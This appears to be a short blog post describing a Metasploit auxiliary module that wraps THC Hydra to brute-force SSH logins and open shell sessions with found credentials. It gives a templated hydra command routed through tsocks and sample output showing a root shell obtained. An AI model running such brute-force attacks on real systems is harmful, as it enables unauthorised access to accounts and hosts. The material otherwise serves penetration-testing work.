I have written a simple Auxiliary module for Metasploit that permits to brute-force SSH accounts with THC Hydra and load the sessions in  Metasploit.

The approach is as simple as executing Hydra from the shell and recovering the valid credentials with a regular expression. After this, we o nly have to open a new session with the  SSH libraries available in the framework.

As a side note, this module cannot be used through pivoting like any external program, but the code can be modified to call hydra with a wrapper like tsocks and then scan trough the Socks4a server module.

$ tsocks hydra -f -o {logfile} -w {timeout} -t {threads} \
  -s {rport} -C{credentials} {ip}  ssh2

NOTE: Some of the code is borrowed from the existing SSH auxiliary modules.

Example output:

msf auxiliary(ssh_hydra) > info
    Name: Scanning SSH servers with Hydra  
    Module: auxiliary/scanner/ssh/ssh_hydra  
    Version: 1  
    License: Metasploit Framework License (BSD)  
    Rank: Normal  
Provided by:  
Basic options:  
  Name         Current Setting   Required  Description  
  ----         ---------------   --------  -----------  
  CREDENTIALS  /tmp/credentials  yes       colon separated list of credentials  
  RHOSTS       X.X.X.X           yes       The target address range or CIDR identifier  
  RPORT        22                yes       The target port  
  TASKS        8                 yes       number of connexions in parallel  
  TIMEOUT      30                yes       timeout for the responses  
This module will launch THC hydra to brute-force the ssh credentials and then open the
sessions with the valid ones.  
msf auxiliary(ssh_hydra) > run  
[*] X.X.X.X:22, SSH server version: SSH- 1.99-OpenSSH_4.4  
[*] Attacking X.X.X.X  
[*] X.X.X.X:22  /tmp/credentials - Calling Hydra  
[*] Valid credentials found: X.X.X.X root root  
[*] Command shell session 1 opened (Y.Y.Y.Y:35009 -> X.X.X.X:22) at Fri Aug 05 19:06:00 +0200 2011  
[*] Scanned 1 of 1 hosts (100% complete)  
[*] Auxiliary module execution completed

The module can be found here: ssh_hydra.rb